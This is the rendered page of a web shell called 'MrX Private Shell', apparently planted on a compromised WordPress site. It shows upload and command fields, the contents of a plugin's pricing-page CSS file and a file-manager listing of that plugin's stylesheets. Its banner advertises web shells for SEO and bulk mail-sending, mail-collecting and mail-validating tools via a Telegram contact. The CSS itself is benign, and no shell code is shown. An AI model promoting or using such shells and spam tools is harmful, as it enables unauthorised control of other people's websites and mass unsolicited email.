__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#fs_pricing_app .fs-package .fs-plan-description {
    padding: 20px;
}

section.fs-section.fs-section--custom-implementation {
    display: none !important;
}


/* Premium Upgrade Button */
#fs_pricing_app .fs-upgrade-button-container {
    /* margin: 2.5rem 0 !important; */
    padding: 0 10% 30px !important;
}

#fs_pricing_app .fs-upgrade-button {
    background: linear-gradient(135deg, #667eea, #764ba2) !important;
    color: white !important;
    border: none !important;
    padding: 1.3rem 3rem !important;
    border-radius: 60px !important;
    font-size: 1.0rem !important;
    font-weight: 700 !important;
    cursor: pointer !important;
    transition: all 0.4s cubic-bezier(0.4, 0, 0.2, 1) !important;
    text-transform: uppercase !important;
    letter-spacing: 2px !important;
    box-shadow: 0 12px 35px rgba(102, 126, 234, 0.4) !important;
    width: 100% !important;
    position: relative !important;
    overflow: hidden !important;
    margin-top: 10px !important;
}

#fs_pricing_app .fs-upgrade-button::before {
    content: '' !important;
    position: absolute !important;
    top: 0 !important;
    left: -100% !important;
    width: 100% !important;
    height: 100% !important;
    background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent) !important;
    transition: left 0.6s !important;
}

#fs_pricing_app .fs-upgrade-button:hover::before {
    left: 100% !important;
}

#fs_pricing_app .fs-upgrade-button:hover {
    transform: translateY(-3px) !important;
    box-shadow: 0 20px 50px rgba(102, 126, 234, 0.5) !important;
    background: linear-gradient(135deg, #5a67d8, #6b46c1) !important;
}

#fs_pricing_app .fs-upgrade-button:active {
    transform: translateY(-1px) !important;
}


/* Enhanced Features List */
#fs_pricing_app .fs-plan-features {
    list-style: none !important;
    padding: 0 !important;
    margin: 0 !important;
    text-align: left !important;
}

#fs_pricing_app .fs-plan-features li {
    display: flex !important;
    align-items: center !important;
    gap: 1rem !important;
    margin: 1.2rem 10% !important;
    padding: 0.8rem 0 !important;
    background: rgba(102, 126, 234, 0.05) !important;
    border-radius: 12px !important;
    padding-left: 1rem !important;
    transition: all 0.3s ease !important;
}

#fs_pricing_app .fs-plan-features li:hover {
    background: rgba(102, 126, 234, 0.1) !important;
    transform: translateX(5px) !important;
}

#fs_pricing_app .fs-plan-features .fs-icon {
    color: #38a169 !important;
    flex-shrink: 0 !important;
    width: 24px !important;
    height: 24px !important;
    margin-top: 0.2rem !important;
    background: rgba(56, 161, 105, 0.1) !important;
    border-radius: 50% !important;
    padding: 2px !important;
    display: flex !important;
    align-items: center;
    justify-content: center;
}

#fs_pricing_app .fs-plan-features .fs-feature-title {
    color: #2d3748 !important;
    font-weight: 600 !important;
    flex: 1 !important;
    font-size: 1.05rem !important;
}

/* ================================ */

/* Enhanced Money Back Guarantee */
#fs_pricing_app .fs-section--money-back-guarantee {
    background: rgba(255, 255, 255, 0.98) !important;
    backdrop-filter: blur(20px) !important;
    -webkit-backdrop-filter: blur(20px) !important;
    border-radius: 24px !important;
    padding: 4rem 3rem !important;
    text-align: center !important;
    margin: 4rem auto !important;
    /* box-shadow: 0 25px 50px rgba(0, 0, 0, 0.15) !important; */
    position: relative !important;
    overflow: hidden !important;
    border: 1px solid rgba(255, 255, 255, 0.3) !important;
    max-width: 768px;
}

#fs_pricing_app .fs-section--money-back-guarantee::before {
    content: '' !important;
    position: absolute !important;
    top: 0 !important;
    left: 0 !important;
    right: 0 !important;
    height: 6px !important;
    background: linear-gradient(90deg, #667eea, #764ba2, #667eea) !important;
}

#fs_pricing_app .fs-money-back-guarantee-title {
    font-size: 2.5rem !important;
    color: #2d3748 !important;
    margin: 0 0 2rem 0 !important;
    font-weight: 800 !important;
}

#fs_pricing_app .fs-money-back-guarantee-message {
    font-size: 1.3rem !important;
    color: #718096 !important;
    margin: 0 0 3rem 0 !important;
    line-height: 1.7 !important;
    max-width: 700px !important;
    margin-left: auto !important;
    margin-right: auto !important;
    font-weight: 400 !important;
}

#fs_pricing_app .fs-section--money-back-guarantee .fs-button {
    background: linear-gradient(135deg, #38a169, #48bb78) !important;
    color: white !important;
    border: none !important;
    padding: 1rem 2.5rem !important;
    border-radius: 30px !important;
    font-weight: 700 !important;
    cursor: pointer !important;
    transition: all 0.4s ease !important;
    margin-bottom: 2rem !important;
    font-size: 1.1rem !important;
    text-transform: uppercase !important;
    letter-spacing: 1px !important;
    display: none;
}

#fs_pricing_app .fs-section--money-back-guarantee .fs-button:hover {
    transform: translateY(-3px) !important;
    box-shadow: 0 12px 35px rgba(56, 161, 105, 0.4) !important;
}

#fs_pricing_app .fs-section--money-back-guarantee img {
    max-width: 140px !important;
    opacity: 0.9 !important;
}


/* ================================ */


li.fs-package {
    width: auto !important;
    border: none !important;
    border-radius: 24px !important;
}

ul.fs-packages {
    width: auto !important;
    justify-content: center;
    max-width: 450px;
}

#fs_pricing_app .fs-package .fs-plan-title {
    border: 1px solid var(--fs-ds-theme-divider-color);
}

#fs_pricing_app .fs-package .fs-plan-features li .fs-tooltip {
    margin-right: 10px !important;
}

Filemanager

Name Type Size Permission Actions
account.css File 2.72 KB 0640
admin.css File 18.13 KB 0640
ai-imagefield.css File 4.79 KB 0640
ai-settings.css File 2.19 KB 0640
ai-textfield.css File 1.32 KB 0640
elementor-editor.css File 25.55 KB 0640
media-alt-text.css File 0 B 0640
menu-icon.css File 3.57 KB 0640
pricing.css File 5.64 KB 0640
settings.css File 2.13 KB 0640
templates.css File 18.63 KB 0640
Filemanager